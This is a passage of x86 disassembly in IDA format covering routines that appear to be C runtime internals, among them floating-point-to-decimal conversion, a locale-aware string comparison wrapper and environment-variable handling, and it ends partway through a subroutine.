off_435822 dd offset loc_4353EB ; DATA XREF: sub_435381+63�r
dd offset loc_43543A ; jump table for switch statement
dd offset loc_435491
dd offset loc_4354BB
dd offset loc_435516
dd offset loc_43558D
dd offset loc_4355C3
dd offset loc_43560D
dd offset loc_4355EC
dd offset loc_435671
dd offset loc_43565B
dd offset loc_435627
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435852 proc near ; CODE XREF: sub_434593+2B�p
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = word ptr -10h
var_E = dword ptr -0Eh
var_A = dword ptr -0Ah
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_14]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0CCh
mov [ebp+var_19], 0CCh
mov [ebp+var_18], 0CCh
mov [ebp+var_17], 0CCh
mov [ebp+var_16], 0CCh
mov [ebp+var_15], 0CCh
mov [ebp+var_14], 0CCh
mov [ebp+var_13], 0CCh
mov [ebp+var_12], 0FBh
mov [ebp+var_11], 3Fh
mov [ebp+var_4], 1
mov edx, eax
jz short loc_4358B4
mov byte ptr [ebx+2], 2Dh
jmp short loc_4358B8
; ---------------------------------------------------------------------------
loc_4358B4: ; CODE XREF: sub_435852+5A�j
mov byte ptr [ebx+2], 20h
loc_4358B8: ; CODE XREF: sub_435852+60�j
mov edi, [ebp+arg_4]
test dx, dx
jnz short loc_4358DE
test edi, edi
jnz short loc_4358DE
cmp [ebp+arg_0], edi
jnz short loc_4358DE
loc_4358C9: ; CODE XREF: sub_435852+181�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
jmp loc_435ADC
; ---------------------------------------------------------------------------
loc_4358DE: ; CODE XREF: sub_435852+6C�j
; sub_435852+70�j ...
cmp dx, si
jnz short loc_43595D
mov eax, 80000000h
mov word ptr [ebx], 1
cmp edi, eax
jnz short loc_4358F7
cmp [ebp+arg_0], 0
jz short loc_435906
loc_4358F7: ; CODE XREF: sub_435852+9D�j
test edi, 40000000h
jnz short loc_435906
push offset dword_437F30
jmp short loc_43594C
; ---------------------------------------------------------------------------
loc_435906: ; CODE XREF: sub_435852+A3�j
; sub_435852+AB�j
test cx, cx
jz short loc_435920
cmp edi, 0C0000000h
jnz short loc_435920
cmp [ebp+arg_0], 0
jnz short loc_435947
push offset dword_437F28
jmp short loc_43592F
; ---------------------------------------------------------------------------
loc_435920: ; CODE XREF: sub_435852+B7�j
; sub_435852+BF�j
cmp edi, eax
jnz short loc_435947
cmp [ebp+arg_0], 0
jnz short loc_435947
push offset dword_437F20
loc_43592F: ; CODE XREF: sub_435852+CC�j
lea eax, [ebx+4]
push eax
call sub_42A5D0
pop ecx
mov byte ptr [ebx+3], 5
pop ecx
loc_43593E: ; CODE XREF: sub_435852+109�j
and [ebp+var_4], 0
jmp loc_435AB5
; ---------------------------------------------------------------------------
loc_435947: ; CODE XREF: sub_435852+C5�j
; sub_435852+D0�j ...
push offset dword_437F18
loc_43594C: ; CODE XREF: sub_435852+B2�j
lea eax, [ebx+4]
push eax
call sub_42A5D0
pop ecx
mov byte ptr [ebx+3], 6
pop ecx
jmp short loc_43593E
; ---------------------------------------------------------------------------
loc_43595D: ; CODE XREF: sub_435852+8F�j
movzx eax, dx
mov ecx, edi
mov esi, eax
shr ecx, 18h
imul eax, 4D10h
shr esi, 8
and [ebp+var_10], 0
push 1
lea ecx, [esi+ecx*2]
mov [ebp+var_6], dx
imul ecx, 4Dh
mov [ebp+var_A], edi
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
sar esi, 10h
mov [ebp+var_E], eax
movsx eax, si
neg eax
push eax
lea eax, [ebp+var_10]
push eax
call sub_436254
add esp, 0Ch
cmp [ebp+var_6], 3FFFh
jb short loc_4359BE
lea eax, [ebp+var_1C]
inc esi
push eax
lea eax, [ebp+var_10]
push eax
call sub_436034
pop ecx
pop ecx
loc_4359BE: ; CODE XREF: sub_435852+15A�j
test [ebp+arg_10], 1
mov [ebx], si
jz short loc_4359D8
mov edi, [ebp+arg_C]
movsx eax, si
add edi, eax
test edi, edi
jg short loc_4359DB
jmp loc_4358C9
; ---------------------------------------------------------------------------
loc_4359D8: ; CODE XREF: sub_435852+173�j
mov edi, [ebp+arg_C]
loc_4359DB: ; CODE XREF: sub_435852+17F�j
cmp edi, 15h
jle short loc_4359E3
push 15h
pop edi
loc_4359E3: ; CODE XREF: sub_435852+18C�j
movzx esi, [ebp+var_6]
sub esi, 3FFEh
and [ebp+var_6], 0
mov [ebp+arg_14], 8
loc_4359F9: ; CODE XREF: sub_435852+1B4�j
lea eax, [ebp+var_10]
push eax
call sub_43525F
dec [ebp+arg_14]
pop ecx
jnz short loc_4359F9
test esi, esi
jge short loc_435A23
neg esi
and esi, 0FFh
jle short loc_435A23
loc_435A16: ; CODE XREF: sub_435852+1CF�j
lea eax, [ebp+var_10]
push eax
call sub_43528D
dec esi
pop ecx
jnz short loc_435A16
loc_435A23: ; CODE XREF: sub_435852+1B8�j
; sub_435852+1C2�j
lea ecx, [edi+1]
lea eax, [ebx+4]
test ecx, ecx
mov [ebp+arg_14], eax
jle short loc_435A80
mov [ebp+arg_C], ecx
loc_435A33: ; CODE XREF: sub_435852+229�j
lea esi, [ebp+var_10]
lea edi, [ebp+arg_0]
movsd
movsd
lea eax, [ebp+var_10]
push eax
movsd
call sub_43525F
lea eax, [ebp+var_10]
push eax
call sub_43525F
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_435201
lea eax, [ebp+var_10]
push eax
call sub_43525F
mov al, byte ptr [ebp+var_6+1]
mov ecx, [ebp+arg_14]
and byte ptr [ebp+var_6+1], 0
add esp, 14h
add al, 30h
inc [ebp+arg_14]
dec [ebp+arg_C]
mov [ecx], al
jnz short loc_435A33
mov eax, [ebp+arg_14]
loc_435A80: ; CODE XREF: sub_435852+1DC�j
mov cl, [eax-1]
dec eax
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_435ABD
loc_435A8D: ; CODE XREF: sub_435852+248�j
cmp eax, ecx
jb short loc_435AA0
cmp byte ptr [eax], 39h
jnz short loc_435A9C
mov byte ptr [eax], 30h
dec eax
jmp short loc_435A8D
; ---------------------------------------------------------------------------
loc_435A9C: ; CODE XREF: sub_435852+242�j
cmp eax, ecx
jnb short loc_435AA4
loc_435AA0: ; CODE XREF: sub_435852+23D�j
inc eax
inc word ptr [ebx]
loc_435AA4: ; CODE XREF: sub_435852+24C�j
inc byte ptr [eax]
loc_435AA6: ; CODE XREF: sub_435852+279�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_435AB5: ; CODE XREF: sub_435852+F0�j
mov eax, [ebp+var_4]
loc_435AB8: ; CODE XREF: sub_435852+291�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_435ABD: ; CODE XREF: sub_435852+239�j
; sub_435852+275�j
cmp eax, ecx
jb short loc_435ACD
cmp byte ptr [eax], 30h
jnz short loc_435AC9
dec eax
jmp short loc_435ABD
; ---------------------------------------------------------------------------
loc_435AC9: ; CODE XREF: sub_435852+272�j
cmp eax, ecx
jnb short loc_435AA6
loc_435ACD: ; CODE XREF: sub_435852+26D�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ecx], 30h
loc_435ADC: ; CODE XREF: sub_435852+87�j
and byte ptr [ebx+5], 0
push 1
pop eax
jmp short loc_435AB8
sub_435852 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435AE5 proc near ; CODE XREF: sub_434C1A+27�p
var_3C = dword ptr -3Ch
var_36 = byte ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437F38
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
cmp dword_676C8C, ebx
push 1
pop edi
jnz short loc_435B58
push edi
mov eax, offset dword_437670
push eax
push edi
push eax
push ebx
push ebx
call dword_4371A0 ; CompareStringW
test eax, eax
jz short loc_435B35
mov dword_676C8C, edi
jmp short loc_435B58
; ---------------------------------------------------------------------------
loc_435B35: ; CODE XREF: sub_435AE5+46�j
push edi
mov eax, offset word_454038
push eax
push edi
push eax
push ebx
push ebx
call dword_4371A4 ; CompareStringA
test eax, eax
jz loc_435D4E
mov dword_676C8C, 2
loc_435B58: ; CODE XREF: sub_435AE5+31�j
; sub_435AE5+4E�j
mov esi, [ebp+arg_C]
cmp esi, ebx
jle short loc_435B6F
push esi
push [ebp+arg_8]
call sub_435D62
pop ecx
pop ecx
mov esi, eax
mov [ebp+arg_C], esi
loc_435B6F: ; CODE XREF: sub_435AE5+78�j
cmp [ebp+arg_14], ebx
jle short loc_435B84
push [ebp+arg_14]
push [ebp+arg_10]
call sub_435D62
pop ecx
pop ecx
mov [ebp+arg_14], eax
loc_435B84: ; CODE XREF: sub_435AE5+8D�j
mov eax, dword_676C8C
cmp eax, 2
jnz short loc_435BA9
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4371A4 ; CompareStringA
jmp loc_435D50
; ---------------------------------------------------------------------------
loc_435BA9: ; CODE XREF: sub_435AE5+A7�j
cmp eax, edi
jnz loc_435D4E
cmp [ebp+arg_18], ebx
jnz short loc_435BBE
mov eax, dword_6769B8
mov [ebp+arg_18], eax
loc_435BBE: ; CODE XREF: sub_435AE5+CF�j
cmp esi, ebx
jz short loc_435BCB
cmp [ebp+arg_14], ebx
jnz loc_435C63
loc_435BCB: ; CODE XREF: sub_435AE5+DB�j
cmp esi, [ebp+arg_14]
jnz short loc_435BD8
loc_435BD0: ; CODE XREF: sub_435AE5+13C�j
; sub_435AE5+16D�j
push 2
loc_435BD2: ; CODE XREF: sub_435AE5+146�j
pop eax
jmp loc_435D50
; ---------------------------------------------------------------------------
loc_435BD8: ; CODE XREF: sub_435AE5+E9�j
cmp [ebp+arg_14], edi
jle short loc_435BE4
loc_435BDD: ; CODE XREF: sub_435AE5+151�j
; sub_435AE5+159�j ...
mov eax, edi
jmp loc_435D50
; ---------------------------------------------------------------------------
loc_435BE4: ; CODE XREF: sub_435AE5+F6�j
cmp esi, edi
jg short loc_435C29
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_18]
call dword_4371D8 ; GetCPInfo
test eax, eax
jz loc_435D4E
cmp esi, ebx
jle short loc_435C2D
cmp [ebp+var_3C], 2
jb short loc_435C29
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_435C29
loc_435C0F: ; CODE XREF: sub_435AE5+142�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_435C29
mov ecx, [ebp+arg_8]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_435C23
cmp cl, dl
jbe short loc_435BD0
loc_435C23: ; CODE XREF: sub_435AE5+138�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_435C0F
loc_435C29: ; CODE XREF: sub_435AE5+101�j
; sub_435AE5+120�j ...
push 3
jmp short loc_435BD2
; ---------------------------------------------------------------------------
loc_435C2D: ; CODE XREF: sub_435AE5+11A�j
cmp [ebp+arg_14], ebx
jle short loc_435C63
cmp [ebp+var_3C], 2
jb short loc_435BDD
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_435BDD
loc_435C40: ; CODE XREF: sub_435AE5+177�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_435BDD
mov ecx, [ebp+arg_10]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_435C58
cmp cl, dl
jbe loc_435BD0
loc_435C58: ; CODE XREF: sub_435AE5+169�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_435C40
jmp loc_435BDD
; ---------------------------------------------------------------------------
loc_435C63: ; CODE XREF: sub_435AE5+E0�j
; sub_435AE5+14B�j
push ebx
push ebx
push esi
push [ebp+arg_8]
push 9
push [ebp+arg_18]
call dword_437184 ; MultiByteToWideChar
mov [ebp+var_1C], eax
cmp eax, ebx
jz loc_435D4E
mov [ebp+var_4], ebx
add eax, eax
add eax, 3
and al, 0FCh
call sub_429B60
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_435CB2
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+arg_C]
push 1
pop edi
loc_435CB2: ; CODE XREF: sub_435AE5+1B5�j
cmp [ebp+var_24], ebx
jz loc_435D4E
push [ebp+var_1C]
push [ebp+var_24]
push esi
push [ebp+arg_8]
push edi
push [ebp+arg_18]
mov esi, dword_437184
call esi ; dword_437184
test eax, eax
jz short loc_435D4E
push ebx
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push 9
push [ebp+arg_18]
call esi ; dword_437184
mov esi, eax
mov [ebp+var_20], esi
cmp esi, ebx
jz short loc_435D4E
mov [ebp+var_4], edi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_429B60
mov [ebp+var_18], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_435D1D
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor edi, edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_20]
loc_435D1D: ; CODE XREF: sub_435AE5+224�j
cmp edi, ebx
jz short loc_435D4E
push esi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push 1
push [ebp+arg_18]
call dword_437184 ; MultiByteToWideChar
test eax, eax
jz short loc_435D4E
push esi
push edi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4371A0 ; CompareStringW
jmp short loc_435D50
; ---------------------------------------------------------------------------
loc_435D4E: ; CODE XREF: sub_435AE5+63�j
; sub_435AE5+C6�j ...
xor eax, eax
loc_435D50: ; CODE XREF: sub_435AE5+BF�j
; sub_435AE5+EE�j ...
lea esp, [ebp-4Ch]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_435AE5 endp
; =============== S U B R O U T I N E =======================================
sub_435D62 proc near ; CODE XREF: sub_430D9F+81�p
; sub_435AE5+7E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_435D7F
loc_435D72: ; CODE XREF: sub_435D62+1B�j
cmp byte ptr [eax], 0
jz short loc_435D7F
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_435D72
loc_435D7F: ; CODE XREF: sub_435D62+E�j
; sub_435D62+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_435D8A
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_435D8A: ; CODE XREF: sub_435D62+21�j
mov eax, edx
retn
sub_435D62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435D8D proc near ; CODE XREF: sub_434C59+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_0], edi
jz short loc_435DF1
push 3Dh
push [ebp+arg_0]
call sub_434794
mov esi, eax
pop ecx
cmp esi, edi
pop ecx
mov [ebp+var_8], esi
jz short loc_435DF1
cmp [ebp+arg_0], esi
jz short loc_435DF1
mov eax, dword_6769EC
xor ebx, ebx
cmp [esi+1], bl
setz bl
cmp eax, dword_6769F0
jnz short loc_435DD7
push eax
call sub_435F6C
pop ecx
mov dword_6769EC, eax
loc_435DD7: ; CODE XREF: sub_435D8D+3C�j
cmp eax, edi
jnz short loc_435E2F
cmp [ebp+arg_4], edi
jz short loc_435DF9
cmp dword_6769F4, edi
jz short loc_435DF9
call sub_434C59
test eax, eax
jz short loc_435E2F
loc_435DF1: ; CODE XREF: sub_435D8D+D�j
; sub_435D8D+22�j ...
or eax, 0FFFFFFFFh
loc_435DF4: ; CODE XREF: sub_435D8D+182�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_435DF9: ; CODE XREF: sub_435D8D+51�j
; sub_435D8D+59�j
cmp ebx, edi
jnz loc_435F0D
push 4
call sub_4297B8
cmp eax, edi
pop ecx
mov dword_6769EC, eax
jz short loc_435DF1
mov [eax], edi
cmp dword_6769F4, edi
jnz short loc_435E2F
push 4
call sub_4297B8
cmp eax, edi
pop ecx
mov dword_6769F4, eax
jz short loc_435DF1
mov [eax], edi
loc_435E2F: ; CODE XREF: sub_435D8D+4C�j
; sub_435D8D+62�j ...
sub esi, [ebp+arg_0]
mov edi, dword_6769EC
mov [ebp+var_4], edi
push esi
push [ebp+arg_0]
call sub_435F14
mov esi, eax
pop ecx
test esi, esi
pop ecx
jl short loc_435E8F
cmp dword ptr [edi], 0
jz short loc_435E8F
test ebx, ebx
jz short loc_435E87
push dword ptr [edi+esi*4]
lea edi, [edi+esi*4]
call sub_4298F2
pop ecx
loc_435E61: ; CODE XREF: sub_435D8D+E2�j
cmp dword ptr [edi], 0
jz short loc_435E71
mov eax, [edi+4]
inc esi
mov [edi], eax
add edi, 4
jmp short loc_435E61
; ---------------------------------------------------------------------------
loc_435E71: ; CODE XREF: sub_435D8D+D7�j
mov eax, esi
shl eax, 2
push eax
push [ebp+var_4]
call sub_431C83
pop ecx
test eax, eax
pop ecx
jz short loc_435EC1
jmp short loc_435EBC
; ---------------------------------------------------------------------------
loc_435E87: ; CODE XREF: sub_435D8D+C6�j
mov eax, [ebp+arg_0]
mov [edi+esi*4], eax
jmp short loc_435EC1
; ---------------------------------------------------------------------------
loc_435E8F: ; CODE XREF: sub_435D8D+BD�j
; sub_435D8D+C2�j
test ebx, ebx
jnz short loc_435F0D
test esi, esi
jge short loc_435E99
neg esi
loc_435E99: ; CODE XREF: sub_435D8D+108�j
lea eax, ds:8[esi*4]
push eax
push edi
call sub_431C83
pop ecx
test eax, eax
pop ecx
jz loc_435DF1
mov ecx, [ebp+arg_0]
mov [eax+esi*4], ecx
and dword ptr [eax+esi*4+4], 0
loc_435EBC: ; CODE XREF: sub_435D8D+F8�j
mov dword_6769EC, eax
loc_435EC1: ; CODE XREF: sub_435D8D+F6�j
; sub_435D8D+100�j
cmp [ebp+arg_4], 0
jz short loc_435F0D
push [ebp+arg_0]
call sub_4293A0
inc eax
inc eax
push eax
call sub_4297B8
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_435F0D
push [ebp+arg_0]
push esi
call sub_42A5D0
mov eax, esi
pop ecx
sub eax, [ebp+arg_0]
pop ecx
add eax, [ebp+var_8]
and byte ptr [eax], 0
inc eax
neg ebx
sbb ebx, ebx
not ebx
and ebx, eax
push ebx
push esi
call dword_43719C ; SetEnvironmentVariableA
push esi
call sub_4298F2
pop ecx
loc_435F0D: ; CODE XREF: sub_435D8D+6E�j
; sub_435D8D+104�j ...
xor eax, eax
jmp loc_435DF4
sub_435D8D endp
; =============== S U B R O U T I N E =======================================
sub_435F14 proc near ; CODE XREF: sub_435D8D+B2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, dword_6769EC
push edi
mov eax, [esi]
test eax, eax
jz short loc_435F4F
mov edi, [esp+8+arg_4]
loc_435F26: ; CODE XREF: sub_435F14+39�j
push edi
push eax
push [esp+10h+arg_0]
call sub_434C1A
add esp, 0Ch
test eax, eax
jnz short loc_435F45
mov eax, [esi]
mov al, [eax+edi]
cmp al, 3Dh
jz short loc_435F5F
test al, al
jz short loc_435F5F
loc_435F45: ; CODE XREF: sub_435F14+22�j
mov eax, [esi+4]
add esi, 4
test eax, eax
jnz short loc_435F26
loc_435F4F: ; CODE XREF: sub_435F14+C�j
mov eax, esi
sub eax, dword_6769EC
sar eax, 2
neg eax
loc_435F5C: ; CODE XREF: sub_435F14+56�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_435F5F: ; CODE XREF: sub_435F14+2B�j
; sub_435F14+2F�j
mov eax, esi
sub eax, dword_6769EC
sar eax, 2
jmp short loc_435F5C
sub_435F14 endp
; =============== S U B R O U T I N E =======================================
sub_435F6C proc near ; CODE XREF: sub_435D8D+3F�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor ecx, ecx
test edi, edi
jnz short loc_435F7B
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_435F7B: ; CODE XREF: sub_435F6C+9�j
cmp dword ptr [edi], 0
lea eax, [edi+4]
jz short loc_435F8D
loc_435F83: ; CODE XREF: sub_435F6C+1F�j
mov edx, [eax]
inc ecx
add eax, 4
test edx, edx
jnz short loc_435F83
loc_435F8D: ; CODE XREF: sub_435F6C+15�j
push ebx
push ebp
lea eax, ds:4[ecx*4]
push esi
push eax
call sub_4297B8
mov esi, eax
pop ecx
test esi, esi
mov ebp, esi
jnz short loc_435FAE
push 9
call sub_42C67C
pop ecx
loc_435FAE: ; CODE XREF: sub_435F6C+38�j
mov eax, [edi]
mov ebx, edi
loc_435FB2: ; CODE XREF: sub_435F6C+5B�j
test eax, eax
jz short loc_435FC9
push eax
add ebx, 4
call sub_4362D0
mov [esi], eax
mov eax, [ebx]
pop ecx
add esi, 4
jmp short loc_435FB2
; ---------------------------------------------------------------------------
loc_435FC9: ; CODE XREF: sub_435F6C+48�j
and dword ptr [esi], 0
mov eax, ebp
pop esi
pop ebp
pop ebx
pop edi
retn
sub_435F6C endp
; =============== S U B R O U T I N E =======================================
sub_435FD3 proc near ; CODE XREF: sub_434DF9+68�p
; sub_434DF9+B9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea eax, [eax+eax*8]
mov esi, 8000h
mov ecx, dword_676EE0[ecx*4]
lea edx, [ecx+eax*4+4]
mov cl, [ecx+eax*4+4]
mov al, cl
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_436009
and cl, 7Fh
jmp short loc_436016
; ---------------------------------------------------------------------------
loc_436009: ; CODE XREF: sub_435FD3+2F�j
cmp [esp+4+arg_4], 4000h
jnz short loc_436024
or cl, 80h
loc_436016: ; CODE XREF: sub_435FD3+34�j
neg eax
sbb eax, eax
mov [edx], cl
and ax, 0C000h
add eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_436024: ; CODE XREF: sub_435FD3+3E�j
call sub_42F119
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
pop esi
retn
sub_435FD3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_436034 proc near ; CODE XREF: sub_435852+165�p
; sub_436254+69�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov cx, [ebx+0Ah]
xor eax, eax
push edi
mov [ebp+var_14], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
mov ax, [esi+0Ah]
mov edi, ecx
mov edx, 7FFFh
xor edi, eax
and eax, edx
and ecx, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_436234
cmp cx, 7FFFh
jnb loc_436234
cmp dx, 0BFFDh
ja loc_436234
cmp dx, 3FBFh
ja short loc_43609D
xor eax, eax
jmp short loc_4360D7
; ---------------------------------------------------------------------------
loc_43609D: ; CODE XREF: sub_436034+63�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_4360BF
inc [ebp+arg_0]
test [esi+8], edx
jnz short loc_4360BF
xor eax, eax
cmp [esi+4], eax
jnz short loc_4360C1
cmp [esi], eax
jnz short loc_4360C1
jmp loc_43622E
; ---------------------------------------------------------------------------
loc_4360BF: ; CODE XREF: sub_436034+71�j
; sub_436034+79�j
xor eax, eax
loc_4360C1: ; CODE XREF: sub_436034+80�j
; sub_436034+84�j
cmp cx, ax
jnz short loc_4360E4
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_4360E4
cmp [ebx+4], eax
jnz short loc_4360E4
cmp [ebx], eax
jnz short loc_4360E4
loc_4360D7: ; CODE XREF: sub_436034+67�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_43624F
; ---------------------------------------------------------------------------
loc_4360E4: ; CODE XREF: sub_436034+90�j
; sub_436034+98�j ...
mov [ebp+var_10], eax
lea eax, [ebp+var_20]
mov [ebp+var_4], eax
mov [ebp+arg_4], 5
loc_4360F4: ; CODE XREF: sub_436034+122�j
mov eax, [ebp+var_10]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_436148
add eax, esi
lea ecx, [ebx+8]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], ecx
mov [ebp+var_18], eax
loc_436110: ; CODE XREF: sub_436034+112�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
movzx eax, word ptr [eax]
movzx ecx, word ptr [ecx]
imul eax, ecx
mov ecx, [ebp+var_4]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_4351E0
add esp, 0Ch
test eax, eax
jz short loc_43613B
mov eax, [ebp+var_4]
inc word ptr [eax]
loc_43613B: ; CODE XREF: sub_436034+FF�j
add [ebp+var_8], 2
sub [ebp+var_C], 2
dec [ebp+var_18]
jnz short loc_436110
loc_436148: ; CODE XREF: sub_436034+C9�j
add [ebp+var_4], 2
inc [ebp+var_10]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_4360F4
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_43618B
loc_436166: ; CODE XREF: sub_436034+14E�j
test byte ptr [ebp+var_1C+3], 80h
jnz short loc_436184
lea eax, [ebp+var_24]
push eax
call sub_43525F
add [ebp+arg_0], 0FFFFh
pop ecx
cmp word ptr [ebp+arg_0], 0
jg short loc_436166
loc_436184: ; CODE XREF: sub_436034+136�j
cmp word ptr [ebp+arg_0], 0
jg short loc_4361C4
loc_43618B: ; CODE XREF: sub_436034+130�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_4361C4
movsx eax, word ptr [ebp+arg_0]
neg eax
add [ebp+arg_0], eax
mov ebx, eax
loc_4361A4: ; CODE XREF: sub_436034+184�j
test byte ptr [ebp+var_24], 1
jz short loc_4361AD
inc [ebp+var_14]
loc_4361AD: ; CODE XREF: sub_436034+174�j
lea eax, [ebp+var_24]
push eax
call sub_43528D
dec ebx
pop ecx
jnz short loc_4361A4
cmp [ebp+var_14], 0
jz short loc_4361C4
or byte ptr [ebp+var_24], 1
loc_4361C4: ; CODE XREF: sub_436034+155�j
; sub_436034+163�j ...
cmp word ptr [ebp+var_24], 8000h
ja short loc_4361DB
mov eax, [ebp+var_24]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_436210
loc_4361DB: ; CODE XREF: sub_436034+196�j
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_43620D
and [ebp+var_24+2], 0
cmp [ebp+var_20+2], 0FFFFFFFFh
jnz short loc_436208
and [ebp+var_20+2], 0
cmp word ptr [ebp+var_1C+2], 0FFFFh
jnz short loc_436202
inc [ebp+arg_0]
mov word ptr [ebp+var_1C+2], 8000h
jmp short loc_436210
; ---------------------------------------------------------------------------
loc_436202: ; CODE XREF: sub_436034+1C1�j
inc word ptr [ebp+var_1C+2]
jmp short loc_436210
; ---------------------------------------------------------------------------
loc_436208: ; CODE XREF: sub_436034+1B5�j
inc [ebp+var_20+2]
jmp short loc_436210
; ---------------------------------------------------------------------------
loc_43620D: ; CODE XREF: sub_436034+1AB�j
inc [ebp+var_24+2]
loc_436210: ; CODE XREF: sub_436034+1A5�j
